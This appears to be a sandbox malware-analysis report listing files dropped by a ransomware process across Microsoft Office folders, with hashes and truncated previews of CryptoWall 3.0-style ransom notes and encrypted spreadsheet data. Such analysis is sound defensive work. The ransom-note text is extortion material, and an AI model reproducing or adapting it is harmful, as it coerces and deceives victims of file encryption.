                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\PROOF\1036\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\PROOF\3082\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\PROOF\3082\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\PROOF\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\PROOF\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\PUBBA\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\PUBBA\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\PUBWIZ\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\PUBWIZ\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\QUERIES\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\QUERIES\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):119214
                                                                                                                          Entropy (8bit):7.9984035682912555
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:mlJwykQDIw2alpuU1PqkfdOOiXdaSa+KBidGDsOF2RIjL1ovBbgKFe8qbHmmw43k:erDn9E2NVbigbRzUkqNm5JMH8vS
                                                                                                                          MD5:3A88085FB9768C6EF6BE0CB78BE68499
                                                                                                                          SHA1:0F1C190F1C1F7CDE0F2740565F86ECB7FE68A1C7
                                                                                                                          SHA-256:91AC8222D88C60019CCCF86DA888A609CDC762031AEF670E505D98FD9F0FE4BB
                                                                                                                          SHA-512:D6AAA607F0323F1E36D28685191657A758FA804B9EF31169D3F89A078D2F51CE1B5C5EB4FA4B4F52FDAE9C927B5F7E201C5EE0DCF3BD4E396DE80A0E3E4B569F
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......zv.A..,.h4.........h.q...l.L.yrI...iL|+RmX.%.6=....\?X....+_.{J....M..xNIDu........PD;?.[...u.x&r...X.T.a"Rlp......t).c...uL..`...b....EI....}..O..i..@..a..zM..g....`"et..kI.Y..`.8?..j2.YB.v.%......a.....f'1.].XL......1.@..8..u.h!.t.....LT..pO....H..H.s%.v.m._..hTgZ;.Z.;.G...*wWA..tC...(.............&.t...d..{?)j.;..wu....4..%i..%ax...W]/xB..@.E.....R\nZ.5......Q.,.^...A..{F....0...m.8.(..P...a.[nqh.m..EA.u*K..e..K.-;M.I..[2.......q."~.......Q.....~=.\.X}.q,.....hB|vj<q......4~.......j.y.5......D....+.67C7.}..V.g....."..@.\.g.VI2..7j.v!.1.i.B.Nu.:.J.$..C.0L.l.nYU....

                                                                                                                          C:\Program Files\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):119214
                                                                                                                          Entropy (8bit):7.9984035682912555
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:mlJwykQDIw2alpuU1PqkfdOOiXdaSa+KBidGDsOF2RIjL1ovBbgKFe8qbHmmw43k:erDn9E2NVbigbRzUkqNm5JMH8vS
                                                                                                                          MD5:3A88085FB9768C6EF6BE0CB78BE68499
                                                                                                                          SHA1:0F1C190F1C1F7CDE0F2740565F86ECB7FE68A1C7
                                                                                                                          SHA-256:91AC8222D88C60019CCCF86DA888A609CDC762031AEF670E505D98FD9F0FE4BB
                                                                                                                          SHA-512:D6AAA607F0323F1E36D28685191657A758FA804B9EF31169D3F89A078D2F51CE1B5C5EB4FA4B4F52FDAE9C927B5F7E201C5EE0DCF3BD4E396DE80A0E3E4B569F
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......zv.A..,.h4.........h.q...l.L.yrI...iL|+RmX.%.6=....\?X....+_.{J....M..xNIDu........PD;?.[...u.x&r...X.T.a"Rlp......t).c...uL..`...b....EI....}..O..i..@..a..zM..g....`"et..kI.Y..`.8?..j2.YB.v.%......a.....f'1.].XL......1.@..8..u.h!.t.....LT..pO....H..H.s%.v.m._..hTgZ;.Z.;.G...*wWA..tC...(.............&.t...d..{?)j.;..wu....4..%i..%ax...W]/xB..@.E.....R\nZ.5......Q.,.^...A..{F....0...m.8.(..P...a.[nqh.m..EA.u*K..e..K.-;M.I..[2.......q."~.......Q.....~=.\.X}.q,.....hB|vj<q......4~.......j.y.5......D....+.67C7.}..V.g....."..@.\.g.VI2..7j.v!.1.i.B.Nu.:.J.$..C.0L.l.nYU....

                                                                                                                          C:\Program Files\Microsoft Office\Office14\SAMPLES\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\SAMPLES\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\STARTUP\restore_files_gpmus.html

